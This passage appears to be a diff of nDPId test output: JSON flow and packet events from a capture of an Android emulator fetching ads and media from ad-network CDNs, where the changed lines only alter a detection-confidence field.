2B%2BPd0orwc&build=21407102","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36(Mobile; vpadn-sdk-a-v4.6.4)"}} 
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2286,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184857,"flow_last_seen":1654385184857,"flow_idle_time":7580000,"flow_min_l4_payload_len":1044,"flow_max_l4_payload_len":1044,"flow_tot_l4_payload_len":1044,"flow_avg_l4_payload_len":1044,"midstream":1,"thread_ts_msec":1654385184857,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"202.153.196.53","src_port":58760,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01865{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2286,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":181,"flow_packet_id":1,"flow_last_seen":1654385184857,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1110,"pkt_l4_len":1076,"thread_ts_msec":1654385184857,"pkt":"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"} -01703{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2286,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184857,"flow_last_seen":1654385184857,"flow_idle_time":7580000,"flow_min_l4_payload_len":1044,"flow_max_l4_payload_len":1044,"flow_tot_l4_payload_len":1044,"flow_avg_l4_payload_len":1044,"midstream":1,"thread_ts_msec":1654385184857,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"202.153.196.53","src_port":58760,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"tw.api.vpon.com","url":"tw.api.vpon.com\/api\/webviewAdReq?s_w=731&s_h=411&u_w=683&u_h=411&u_sd=2.625&lang=en_US&ni=0&sdk=vpadn-sdk-a-v4.6.4&u_o=2&os_v=30&n_mnc=260&n_mcc=310&mnc=260&mcc=310&format=320x50_mb&msid=com.sceneway.kankan&app_name=30.android.com.sceneway.kankan&simulator=0&cap=cal_m2_a_inv_cam_ph_sms_comp_fr_banInv_vid_vid2_vid3_vid4_vid5_crazyAd_cal_stoPic_exp&output=html&pf=TW&sid=1654385180339&seq=1&bid=8a8081824ff371e0014ff95e599f072d&adtest=0&ad_x=0&ad_y=0&ad_w=0&ad_h=0&ad_v=0&ms=C5QEn98CxlhiR4J%2FlC6Jf%2BtJncJYA72vXPe2O30%2FS7VTBF1NaLeAFAR5FIfYrRaYSVaBH%2BSKUFr11A2FE8GRJzLjt3bu0AA46LRogz0hoDRpsqbVLYu0zYcV0c0VkdMXnVfJhjpJRgKcxHWo4vQzq6LswfA0t80W6gGyFv5IyzBT6b6E1FNHU2pQIOg0j9WNqraa%2BiGRqWm5ptj1pymrNv7tznIxuy%2FwOIXeDKq%2BPJOWztIn5uQ1CdG%2B%2BPd0orwc&build=21407102","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36(Mobile; vpadn-sdk-a-v4.6.4)"}} +01703{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2286,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184857,"flow_last_seen":1654385184857,"flow_idle_time":7580000,"flow_min_l4_payload_len":1044,"flow_max_l4_payload_len":1044,"flow_tot_l4_payload_len":1044,"flow_avg_l4_payload_len":1044,"midstream":1,"thread_ts_msec":1654385184857,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"202.153.196.53","src_port":58760,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"tw.api.vpon.com","url":"tw.api.vpon.com\/api\/webviewAdReq?s_w=731&s_h=411&u_w=683&u_h=411&u_sd=2.625&lang=en_US&ni=0&sdk=vpadn-sdk-a-v4.6.4&u_o=2&os_v=30&n_mnc=260&n_mcc=310&mnc=260&mcc=310&format=320x50_mb&msid=com.sceneway.kankan&app_name=30.android.com.sceneway.kankan&simulator=0&cap=cal_m2_a_inv_cam_ph_sms_comp_fr_banInv_vid_vid2_vid3_vid4_vid5_crazyAd_cal_stoPic_exp&output=html&pf=TW&sid=1654385180339&seq=1&bid=8a8081824ff371e0014ff95e599f072d&adtest=0&ad_x=0&ad_y=0&ad_w=0&ad_h=0&ad_v=0&ms=C5QEn98CxlhiR4J%2FlC6Jf%2BtJncJYA72vXPe2O30%2FS7VTBF1NaLeAFAR5FIfYrRaYSVaBH%2BSKUFr11A2FE8GRJzLjt3bu0AA46LRogz0hoDRpsqbVLYu0zYcV0c0VkdMXnVfJhjpJRgKcxHWo4vQzq6LswfA0t80W6gGyFv5IyzBT6b6E1FNHU2pQIOg0j9WNqraa%2BiGRqWm5ptj1pymrNv7tznIxuy%2FwOIXeDKq%2BPJOWztIn5uQ1CdG%2B%2BPd0orwc&build=21407102","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36(Mobile; vpadn-sdk-a-v4.6.4)"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2287,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184927,"flow_last_seen":1654385184927,"flow_idle_time":7580000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":183,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":183,"midstream":1,"thread_ts_msec":1654385184927,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.66.2.90","src_port":35664,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00714{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2287,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":182,"flow_packet_id":1,"flow_last_seen":1654385184927,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":249,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":249,"pkt_l4_len":215,"thread_ts_msec":1654385184927,"pkt":"tKXvZygQnLbQ0+MzCABFAADrwv9AAEAGn0vAqAJ+EkICWotQAFAVBORyMNia64AYAfbYnwAAAQEICiE3Bh4xvbnrR0VUIC9jdXN0b21lcnMvNDVkNGIwOWViYS9pbWFnZS9sYW1iZGFfanBnXzg5LzM5ODEwMTIzNGU2Y2Y1YjNhOGQ4LmpwZyBIVFRQLzEuMQ0KSG9zdDogY2RuLmxpZnRvZmYuaW8NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IEFwYWNoZS1IdHRwQ2xpZW50L1VOQVZBSUxBQkxFIChqYXZhIDEuNCkNCg0K"} -00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2287,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184927,"flow_last_seen":1654385184927,"flow_idle_time":7580000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":183,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":183,"midstream":1,"thread_ts_msec":1654385184927,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.66.2.90","src_port":35664,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"cdn.liftoff.io","url":"cdn.liftoff.io\/customers\/45d4b09eba\/image\/lambda_jpg_89\/398101234e6cf5b3a8d8.jpg","code":0,"content_type":"","user_agent":"Apache-HttpClient\/UNAVAILABLE (java 1.4)"}} 
+00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2287,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184927,"flow_last_seen":1654385184927,"flow_idle_time":7580000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":183,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":183,"midstream":1,"thread_ts_msec":1654385184927,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.66.2.90","src_port":35664,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"cdn.liftoff.io","url":"cdn.liftoff.io\/customers\/45d4b09eba\/image\/lambda_jpg_89\/398101234e6cf5b3a8d8.jpg","code":0,"content_type":"","user_agent":"Apache-HttpClient\/UNAVAILABLE (java 1.4)"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2288,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184928,"flow_last_seen":1654385184928,"flow_idle_time":7580000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":1,"thread_ts_msec":1654385184928,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.66.2.90","src_port":35666,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00784{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2288,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":183,"flow_packet_id":1,"flow_last_seen":1654385184928,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":299,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":299,"pkt_l4_len":265,"thread_ts_msec":1654385184928,"pkt":"tKXvZygQnLbQ0+MzCABFAAEdY4hAAEAG\/pDAqAJ+EkICWotSAFAcu+o2K8tK74AYAfbY0QAAAQEICiE3Bh\/fUp7nR0VUIC9jdXN0b21lcnMvNDVkNGIwOWViYS92aWRlb3MvbW9iaWxlL2ZkNTY5MmRkNTMwNDJiMTk5ZTAzLm1wNCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogRGFsdmlrLzIuMS4wIChMaW51eDsgVTsgQW5kcm9pZCAxMTsgc2RrX2dwaG9uZV94ODYgQnVpbGQvUlNSMS4yMDEwMTMuMDAxKQ0KSG9zdDogY2RuLmxpZnRvZmYuaW8NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo="} -00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2288,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184928,"flow_last_seen":1654385184928,"flow_idle_time":7580000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":1,"thread_ts_msec":1654385184928,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.66.2.90","src_port":35666,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MpegDash.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
+00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2288,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184928,"flow_last_seen":1654385184928,"flow_idle_time":7580000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":1,"thread_ts_msec":1654385184928,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.66.2.90","src_port":35666,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"MpegDash.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2289,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184938,"flow_last_seen":1654385184938,"flow_idle_time":7580000,"flow_min_l4_payload_len":345,"flow_max_l4_payload_len":345,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":345,"midstream":1,"thread_ts_msec":1654385184938,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.103.30","src_port":36636,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00930{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2289,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":184,"flow_packet_id":1,"flow_last_seen":1654385184938,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":411,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":411,"pkt_l4_len":377,"thread_ts_msec":1654385184938,"pkt":"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"} 
-01010{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2289,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184938,"flow_last_seen":1654385184938,"flow_idle_time":7580000,"flow_min_l4_payload_len":345,"flow_max_l4_payload_len":345,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":345,"midstream":1,"thread_ts_msec":1654385184938,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.103.30","src_port":36636,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"hybird.rayjump.com","url":"hybird.rayjump.com\/rv-zip-2022\/0428\/tpl4-4209ad845e61d9ad67b6f04187d00be0.zip?md5filename=4209ad845e61d9ad67b6f04187d00be0&foldername=tpl4&layout=1&tpl=4&wfr=1&to=9999&alecfc=1&whs_chn=m","code":0,"content_type":"","user_agent":"Dalvik\/2.1.0 (Linux; U; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001)"}} +01010{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2289,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184938,"flow_last_seen":1654385184938,"flow_idle_time":7580000,"flow_min_l4_payload_len":345,"flow_max_l4_payload_len":345,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":345,"midstream":1,"thread_ts_msec":1654385184938,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.103.30","src_port":36636,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"hybird.rayjump.com","url":"hybird.rayjump.com\/rv-zip-2022\/0428\/tpl4-4209ad845e61d9ad67b6f04187d00be0.zip?md5filename=4209ad845e61d9ad67b6f04187d00be0&foldername=tpl4&layout=1&tpl=4&wfr=1&to=9999&alecfc=1&whs_chn=m","code":0,"content_type":"","user_agent":"Dalvik\/2.1.0 (Linux; U; Android 11; 
sdk_gphone_x86 Build\/RSR1.201013.001)"}} 01446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2290,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":182,"flow_packet_id":2,"flow_last_seen":1654385184942,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":797,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":797,"pkt_l4_len":763,"thread_ts_msec":1654385184942,"pkt":"nLbQ0+MztKXvZygQCABFAAMPiZsAAPgGXosSQgJawKgCfgBQi1Aw2JrrFQTlKYAYAIOpEgAAAQEICjG9uf0hNwYeSFRUUC8xLjEgMjAwIE9LDQpDb250ZW50LVR5cGU6IGltYWdlL2pwZWcNCkNvbnRlbnQtTGVuZ3RoOiAyMzgwOTMNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkRhdGU6IE1vbiwgMTQgTWFyIDIwMjIgMDU6MDY6MTcgR01UDQpBY2Nlc3MtQ29udHJvbC1BbGxvdy1PcmlnaW46ICoNCkFjY2Vzcy1Db250cm9sLUFsbG93LU1ldGhvZHM6IEdFVA0KQWNjZXNzLUNvbnRyb2wtRXhwb3NlLUhlYWRlcnM6IEFjY2Vzcy1Db250cm9sLUFsbG93LU9yaWdpbg0KQWNjZXNzLUNvbnRyb2wtTWF4LUFnZTogMzAwDQpMYXN0LU1vZGlmaWVkOiBNb24sIDE0IE1hciAyMDIyIDA0OjU5OjQ0IEdNVA0KRVRhZzogIjFkZjIzOTBkYzI0MGEyYmY3MjAzZWVjYWUzYTcyMTNiIg0KeC1hbXotc2VydmVyLXNpZGUtZW5jcnlwdGlvbjogQUVTMjU2DQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTMxNTM2MDAwO3B1YmxpYw0KeC1hbXotbWV0YS1sYW1iZGE6IG5vZGUtYXBwDQpBY2NlcHQtUmFuZ2VzOiBieXRlcw0KU2VydmVyOiBBbWF6b25TMw0KWC1DYWNoZTogSGl0IGZyb20gY2xvdWRmcm9udA0KVmlhOiAxLjEgZWVkZjhhYzU2ZTRlMWVjM2IyNDA1NTc1MTRkZjlkNjQuY2xvdWRmcm9udC5uZXQgKENsb3VkRnJvbnQpDQpYLUFtei1DZi1Qb3A6IFRYTDUwLVAxDQpYLUFtei1DZi1JZDogM0tzOHpnV1VFd1BsYUtHLTFsclAtOWxwV3JPTWhZSjJIcktoYnR3ZG9SY3VJYi16WDBTSm9nPT0NCkFnZTogNzE1MDgwOA0KDQo="} 
02396{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2291,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":182,"flow_packet_id":3,"flow_last_seen":1654385184942,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1494,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1494,"pkt_l4_len":1460,"thread_ts_msec":1654385184942,"pkt":"nLbQ0+MztKXvZygQCABFAAXIiZwAAPgGW9ESQgJawKgCfgBQi1Aw2J3GFQTlKYAQAIO33wAAAQEICjG9uf4hNwYe\/9j\/4AAQSkZJRgABAQAAZABkAAD\/2wBDAAQCAwMDAgQDAwMEBAQEBQkGBQUFBQsICAYJDQsNDQ0LDAwOEBQRDg8TDwwMEhgSExUWFxcXDhEZGxkWGhQWFxb\/2wBDAQQEBAUFBQoGBgoWDwwPFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhb\/wAARCAQ4B4ADAREAAhEBAxEB\/8QAHQABAAAHAQEAAAAAAAAAAAAAAAECAwQFBgcICf\/EAGgQAAEDAgQDBAYDBw4JBwsACwEAAgMEEQUGITEHEkETIlFhCBQycYGxQpGhFSMzNFJy0QkWNTZTYmR0gpKissHhFyQlN0NWc3WUGCZGVFWT8Bk4RGNlg4SVs8LU8SdFdrTEw9KFpeP\/xAAdAQEAAwEBAQEBAQAAAAAAAAAAAQIDBAUHBggJ\/8QAShEBAAIBAwIEAwQIBQEHAwALAAECEQMEIRIxBQZBURNhcQciMoEUMzVykaGxwSM0QlLR4RUWJFNigvCSwvElQ0RUorIIJmNz4v\/aAAwDAQACEQMRAD8A9\/ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIIFBBBKggUEpQS9ClRTKsJSqjyQumOz+U6pQS11wbEbEJ27LxMxzDZcrZldC4U9Y67ToHn+1d+33f+m79D4b4xak9GrPDJY7lujxaI1NA5sVRa9hs9erp62I55h0eI+BaG+r8Xbfdv7ektJrqeooah0FXE6N7T1C6eLRw\/Ca+21ttedPVriYUS5RhlEIB3iowscyCAd0BRGEWuOxUwYOYXKRCUAfFMI7osJa7mjJY4dQUwisTWc1nDMYLmjF8OI5ZzNGN2P1VJ0627vY2Xj2+2nEWzHtLaMHzlhGIjsMSgEDnaXIu0rC2haI45fqtn5m2e5jo3Femf5KmPZPoMSpjV4Y5jS4XBYdCvP1dtW3biXVu\/BdDcU+LoTH5NAxWgqcOq3U9VGWObtpuvPtSaTiX5DcbfU0LzS8Ylbs6qjmTMCCKKpkVTNCIlMiEW9UVTAeKKyi0dEGSy9geJ4zUdjQUr5NdXWs1vvKiZxD0vDfB974lqdG2pM\/P0j83R8o8K6eMtlxaR1RJ+5R6NH6VSb+z6l4L9m+hpxF99bqn2jt\/1dCwTLVFQwhlPTQwt8GtCpmZfQtn4Vs9pXp0dOIj5QysNFAwagu96h6ERCvFGxvssaLeAQVBe2iBylA5SgcpQOUoHKUDlKBylA5SgcpQOUoHKUDlKBylA5SgcpQOUoHKUDlKBylA5SgcpQOUoHKUDlKBylA5SgcpQOUoHKUDlKBylA5SgcpQOUoHKUDlKBylA5SgcpQOUoHKUDlKBylA5SgcpQOUoHKUDlK
BylA5SgcpQOUoHKUDlKBylBBAQEBAQEA67oJHQxO9qNqC2qcOp54XRuaC1wsWuFwR53RS+nTUrNbxmJ9JapmLhplvEI3F2GMieRpJTHkI+GytFpflvEPJHge9rPVoxWfevH\/T+Tl+cOFmK4cXzYa71qIa8mzgP7VaLZfKvG\/s332zzqbT79fb1aHUwTU8zoZ4nRvboWvFiFo+da2jqaN5pqVmJj0lIqs0qAgh1sp47LRCCkQHnqowJbpHcS3TCyF99U+QkFybDW6lpWMujcNcE9VpBVStPay6+4KYh+98veHfC0\/iWjmV5xAxv1Kk9Rpn\/AHx471uipqWxGIW8yeLfo2l+j6U8z3aEy+pdu7UrnfPqx6z3CVErIXUJ5QB80SX0TIX80BAQ"} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2293,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184944,"flow_last_seen":1654385184944,"flow_idle_time":7580000,"flow_min_l4_payload_len":497,"flow_max_l4_payload_len":497,"flow_tot_l4_payload_len":497,"flow_avg_l4_payload_len":497,"midstream":1,"thread_ts_msec":1654385184944,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.103.30","src_port":36640,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01135{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2293,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":1,"flow_last_seen":1654385184944,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":563,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":563,"pkt_l4_len":529,"thread_ts_msec":1654385184944,"pkt":"tKXvZygQnLbQ0+MzCABFAAIl9uxAAEAGBWLAqAJ+EkBnHo8gAFD1zY28\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"} 
-01162{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2293,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184944,"flow_last_seen":1654385184944,"flow_idle_time":7580000,"flow_min_l4_payload_len":497,"flow_max_l4_payload_len":497,"flow_tot_l4_payload_len":497,"flow_avg_l4_payload_len":497,"midstream":1,"thread_ts_msec":1654385184944,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.103.30","src_port":36640,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"hybird.rayjump.com","url":"hybird.rayjump.com\/rv-zip-2022\/0428\/endcard-dsp-1302-f2714a34f6661a70fedea1667fb7a9e4.zip?md5filename=f2714a34f6661a70fedea1667fb7a9e4&foldername=endcard-dsp-1302&mof=1&mof_uid=91199&n_imp=1&mof_pkg=com.sceneway.kankan&n_region=fk&alecfc=1&bait_click=1&mof_textmod=1&bp_test=2&wglbp=1&cta_type=1&mof_use_get=1&dlst=0&mof_use_get=1&plmug=1","code":0,"content_type":"","user_agent":"Dalvik\/2.1.0 (Linux; U; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001)"}} +01162{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2293,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184944,"flow_last_seen":1654385184944,"flow_idle_time":7580000,"flow_min_l4_payload_len":497,"flow_max_l4_payload_len":497,"flow_tot_l4_payload_len":497,"flow_avg_l4_payload_len":497,"midstream":1,"thread_ts_msec":1654385184944,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.103.30","src_port":36640,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": 
{"hostname":"hybird.rayjump.com","url":"hybird.rayjump.com\/rv-zip-2022\/0428\/endcard-dsp-1302-f2714a34f6661a70fedea1667fb7a9e4.zip?md5filename=f2714a34f6661a70fedea1667fb7a9e4&foldername=endcard-dsp-1302&mof=1&mof_uid=91199&n_imp=1&mof_pkg=com.sceneway.kankan&n_region=fk&alecfc=1&bait_click=1&mof_textmod=1&bp_test=2&wglbp=1&cta_type=1&mof_use_get=1&dlst=0&mof_use_get=1&plmug=1","code":0,"content_type":"","user_agent":"Dalvik\/2.1.0 (Linux; U; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001)"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2294,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184944,"flow_last_seen":1654385184944,"flow_idle_time":7580000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1654385184944,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.103.30","src_port":36654,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00866{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2294,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":1,"flow_last_seen":1654385184944,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":363,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":363,"pkt_l4_len":329,"thread_ts_msec":1654385184944,"pkt":"tKXvZygQnLbQ0+MzCABFAAFdGtZAAEAG4kDAqAJ+EkBnHo8uAFDRel74fng8vIAYAfY91AAAAQEICpxRp1H7gB08R0VUIC9ydi16aXAtMjAxOS8xMTEzL21pbmktMjYwMjkxYzIwOGJmMzM3NmI1MTExZGI4NTVlODk0NTEuemlwP21kNWZpbGVuYW1lPTI2MDI5MWMyMDhiZjMzNzZiNTExMWRiODU1ZTg5NDUxJmZvbGRlcm5hbWU9bWluaSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogRGFsdmlrLzIuMS4wIChMaW51eDsgVTsgQW5kcm9pZCAxMTsgc2RrX2dwaG9uZV94ODYgQnVpbGQvUlNSMS4yMDEwMTMuMDAxKQ0KSG9zdDogaHliaXJkLnJheWp1bXAuY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCg0K"} 
-00962{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2294,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184944,"flow_last_seen":1654385184944,"flow_idle_time":7580000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1654385184944,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.103.30","src_port":36654,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"hybird.rayjump.com","url":"hybird.rayjump.com\/rv-zip-2019\/1113\/mini-260291c208bf3376b5111db855e89451.zip?md5filename=260291c208bf3376b5111db855e89451&foldername=mini","code":0,"content_type":"","user_agent":"Dalvik\/2.1.0 (Linux; U; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001)"}} 